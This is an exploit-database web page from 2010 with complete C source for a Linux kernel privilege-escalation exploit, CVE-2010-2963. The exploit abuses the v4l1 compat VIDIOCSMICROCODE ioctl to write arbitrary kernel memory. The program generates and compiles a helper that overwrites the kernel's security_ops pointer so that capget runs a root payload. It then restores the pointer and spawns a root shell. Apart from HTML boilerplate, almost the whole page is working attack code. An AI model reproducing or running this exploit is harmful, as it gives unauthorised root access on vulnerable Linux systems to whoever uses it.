[dos / poc] - Linux Kernel VIDIOCSMICROCODE IOCTL Local Memo
Posted on 29 October 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Linux Kernel VIDIOCSMICROCODE IOCTL Local Memory Overwrite | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Linux Kernel VIDIOCSMICROCODE IOCTL Local Memory Overwrite by Kees Cook in dos / poc | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>========================================================== Linux Kernel VIDIOCSMICROCODE IOCTL Local Memory Overwrite ========================================================== /* * CVE-2010-2963 * Arbitrary write memory write via v4l1 compat ioctl. * Kees Cook <kees@ubuntu.com> * * greets to drosenberg, spender, taviso */ #define _GNU_SOURCE #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <fcntl.h> #include <sys/types.h> #include "exp_framework.h" #include <stdint.h> #include <string.h> #include <poll.h> #include <sys/ioctl.h> #include <sys/ipc.h> #include <sys/msg.h> #include <sys/types.h> #include <linux/videodev.h> #include <syscall.h> #include <sys/capability.h> struct cap_header_t { uint32_t version; int pid; }; #define DEVICE "/dev/video0" struct exploit_state *exp_state; char *desc = "Vyakarana: Linux v4l1 compat ioctl arbitrary memory write"; int requires_null_page = 0; int built = 0; int super_memcpy(unsigned long destination, void *source, int length) { struct video_code vc = { }; struct video_tuner tuner = { }; int dev; unsigned int code; char cmd[80]; if (!built) { FILE *source; char *sourcecode = "/* * CVE-2010-2963: Write kernel memory via v4l compat ioctl. * Oct 11, 2010 Kees Cook <kees@ubuntu.com> * */ #define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <stdint.h> #include <unistd.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <string.h> #include <sys/ioctl.h> #include <sys/mman.h> #include <assert.h> #include <malloc.h> #include <sys/types.h> #include <linux/videodev.h> #include <syscall.h> #define DEVICE "/dev/video0" struct video_code32 { char loadwhat[16]; int datasize; int padding; uint64_t data; }; int super_memcpy(uint64_t destination, void *source, int length) { struct video_code32 vc = { }; struct video_tuner tuner = { }; int dev; unsigned int code; if ( (dev=open(DEVICE, O_RDWR)) < 0) { perror(DEVICE); return 1; } vc.datasize = length; vc.data = (uint64_t)(uintptr_t)source; memset(&tuner, 0xBB, sizeof(tuner)); // manual union, since a real union won't do ptrs for 64bit uint64_t *ptr = (uint64_t*)(&(tuner.name[20])); *ptr = destination; // beat memory into the stack... code = VIDIOCSTUNER; syscall(54, dev, code, &tuner); syscall(54, dev, code, &tuner); syscall(54, dev, code, &tuner); syscall(54, dev, code, &tuner); syscall(54, dev, code, &tuner); syscall(54, dev, code, &tuner); code = 0x4020761b; // VIDIOCSMICROCODE32 (why isn't this VIDIOCSMICROCODE?) syscall(54, dev, code, &vc); return 0; } int main(int argc, char *argv[]) { uint64_t destination = strtoull(argv[1], NULL, 16); uint64_t value = strtoull(argv[2], NULL, 16); int length = atoi(argv[3]); if (length > sizeof(value)) length = sizeof(value); return super_memcpy(destination, &value, length); } "; if (!(source = fopen("vyakarana.c","w"))) { fprintf(stderr, "cannot write source "); return 1; } fwrite(sourcecode, strlen(sourcecode), 1, source); fclose(source); if (system("gcc -Wall -m32 vyakarana.c -o vyakarana") != 0) { fprintf(stderr, "cannot build source "); return 1; } built = 1; } printf("Writing to %p (len %d): ", (void*)destination, length); for (dev=0; dev<length; dev++) { printf("0x%02x ", *((unsigned char*)source+dev)); } printf(" "); sprintf(cmd, "./vyakarana %lx %lx 8", (uint64_t)(uintptr_t)destination, *(uint64_t*)source); return system(cmd); } int get_exploit_state_ptr(struct exploit_state *ptr) { exp_state = ptr; return 0; } unsigned long default_sec; unsigned long target; unsigned long restore; int prepare(unsigned char *buf) { unsigned long addr; if (sizeof(long)!=8) { printf("Not enough bits "); return 1; } printf("Reticulating splines... "); addr = exp_state->get_kernel_sym("security_ops"); default_sec = exp_state->get_kernel_sym("default_security_ops"); restore = exp_state->get_kernel_sym("cap_capget"); // reset security_ops super_memcpy(addr, &default_sec, sizeof(void*)); // aim capget to enlightenment payload target = default_sec + ((11 + sizeof(void*) -1) / sizeof(void*))*sizeof(void*) + (2 * sizeof(void*)); super_memcpy(target, &(exp_state->own_the_kernel), sizeof(void*)); return 0; } int trigger(void) { struct cap_header_t hdr; uint32_t data[3]; printf("Skipping school... "); hdr.version = _LINUX_CAPABILITY_VERSION_1; hdr.pid = 1; capget((cap_user_header_t)&hdr, (cap_user_data_t)data); return 1; } int post(void) { printf("Restoring grammar... "); // restore security op pointer super_memcpy(target, &restore, sizeof(void*)); return RUN_ROOTSHELL; } # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-29]</pre></body></html>
